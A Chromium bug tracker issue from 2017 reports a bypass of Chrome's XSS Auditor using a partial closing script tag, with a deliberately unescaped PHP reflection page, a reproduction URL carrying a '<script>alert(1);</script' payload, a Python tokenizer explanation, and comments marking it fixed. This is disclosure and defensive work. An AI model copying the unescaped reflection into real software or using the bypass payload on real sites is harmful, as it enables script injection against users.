
Issue 742459


Issue metadata

Status: Fixed
Owner:
Closed: Jul 2017
Cc:
EstimatedDays: ----
NextAction: ----
OS: Mac
Pri: 2
Type: Bug




XSS Auditor Bypass with partial closing script tag.

Reported by justt...@gmail.com, Jul 13 2017

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36

Steps to reproduce the problem:
1. mkdir /tmp/xss
2. copy the following into /tmp/xss/xss.php
~~~
<?php
// Turn the auditor on in blocking mode so a detected reflection stops the page.
header('X-XSS-Protection: 1; mode=block');
// Deliberately reflects the `html` query parameter unescaped; note the literal
// space between the reflected value and </body>.
echo "<!DOCTYPE html><html><head></head><body>{$_GET['html']} </body></html>";
~~~
3. Run `php -S localhost:9999 /tmp/xss/xss.php`
4. http://localhost:9999/?html=%3Cscript%3Ealert(1);%3C/script
5. Notice how the alert dialog shows. 

The space before `</body>` is important, so the browser can determine a new tag is being opened, and "auto closes" the script tag.

What is the expected behavior?
Chrome should detect a reflected XSS exploit is occurring, and should prevent the page from loading.

What went wrong?
Chrome loads the page and the XSS payload executes.

Did this work before? N/A 

Chrome version: 59.0.3071.115  Channel: stable
OS Version: OS X 10.12.5
Flash Version:
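An added illustration of the tokenizer behaviour the report relies on (this is not the reporter's PHP and not Chromium's XSS Auditor code). It implements the HTML specification's "script data" end-tag rule: inside a script element, `</` followed by the letters `script` ends the element only when the next character is ASCII whitespace, `/` or `>`, so the literal space the PHP template places before `</body>` is what turns the truncated `</script` into a real end tag. The same template is then rendered with output encoding (Python's `html.escape`, the counterpart of PHP's `htmlspecialchars`) to show that the reflected value no longer produces a script element at all, which is the server-side fix the auditor was only ever a backstop for. The page template and payload are constructed from the steps above.

```python
"""Why a truncated "</script" followed by a space still ends a script element.

Implements just enough of the HTML tokenizer's "script data" states to find
where <script> content stops, then renders the report's page template both
raw (as the PHP does) and with output encoding.
"""
import html
import re

# The spec's ASCII whitespace set; "</script" followed by any of these,
# or by "/" or ">", is an "appropriate end tag" and leaves script data.
ASCII_WHITESPACE = "\t\n\f "
START_TAG = re.compile(r"<script(?=[\t\n\f />])[^>]*>", re.IGNORECASE)


def script_blocks(doc):
    """Return the raw text of every <script> element in doc, in order.

    Inside script data, "</" followed by ASCII letters spelling "script"
    (case-insensitive) closes the element only if the next character is
    ASCII whitespace, "/" or ">". Anything else ("</scripts", or "</script"
    at end of input) is ordinary script data, as the HTML spec requires.
    """
    blocks = []
    pos = 0
    while True:
        start = START_TAG.search(doc, pos)
        if start is None:
            return blocks
        content_start = start.end()
        i = content_start
        end = None
        while (j := doc.find("</", i)) != -1:
            k = j + 2
            while k < len(doc) and doc[k].isascii() and doc[k].isalpha():
                k += 1
            name = doc[j + 2:k].lower()
            following = doc[k] if k < len(doc) else ""
            if name == "script" and following and following in ASCII_WHITESPACE + "/>":
                end = j
                break
            i = j + 2
        if end is None:  # unterminated: script data runs to end of input
            blocks.append(doc[content_start:])
            return blocks
        blocks.append(doc[content_start:end])
        # The tokenizer then consumes the end tag (junk and all) up to the next ">".
        gt = doc.find(">", end)
        pos = len(doc) if gt == -1 else gt + 1


# Same shape as the report's xss.php: the parameter is dropped into the body
# and a literal space precedes </body>. Constructed from the steps above.
TEMPLATE = "<!DOCTYPE html><html><head></head><body>{} </body></html>"
# The reporter's URL parameter after percent-decoding (constructed from the report).
REPORTED_PAYLOAD = "<script>alert(1);</script"


def render_raw(value):
    """What the report's PHP emits: the value reflected verbatim."""
    return TEMPLATE.format(value)


def render_encoded(value):
    """Server-side fix: HTML-encode the value (PHP's htmlspecialchars equivalent)."""
    return TEMPLATE.format(html.escape(value, quote=True))


if __name__ == "__main__":
    for label, page in (("raw", render_raw(REPORTED_PAYLOAD)),
                        ("encoded", render_encoded(REPORTED_PAYLOAD))):
        print(label, "->", script_blocks(page))
    # Contrast: with nothing after the partial end tag, it never closes anything.
    print("at EOF ->", script_blocks("<script>alert(1);</script"))
```

Running it shows the raw page yields one script element whose content is `alert(1);` (the `</script ` is a complete end tag), the encoded page yields none, and the same payload with no trailing character leaves `</script` as inert script data. Any filter that matches the reflected parameter against document script content has to apply this same tokenizer rule, which is why such bypasses keep appearing and why encoding at the output point is the dependable control.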
 

Comment 1 by tsepez@chromium.org, Jul 13 2017

Owner: tsepez@chromium.org
Status: Assigned (was: Unconfirmed)

Comment 2 by tsepez@chromium.org, Jul 13 2017

Cc: mkwst@chromium.org
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
We treat xssauditor bypasses as functional bugs per https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Are-XSS-filter-bypasses-considered-security-bugs-

Nonetheless, thanks immensely for the report.  I'm not sure how we missed this case.

Comment 3 by tsepez@chromium.org, Jul 13 2017

Summary: XSS Auditor Bypass with partial closing script tag. (was: XSS Auditor Bypass)

Comment 6 by tsepez@chromium.org, Jul 14 2017

Status: Fixed (was: Assigned)
